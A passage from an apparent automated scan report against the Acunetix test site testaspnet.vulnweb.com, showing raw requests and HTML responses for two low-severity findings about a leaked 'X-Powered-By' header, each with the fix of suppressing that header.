href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        34. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        35. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
VuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
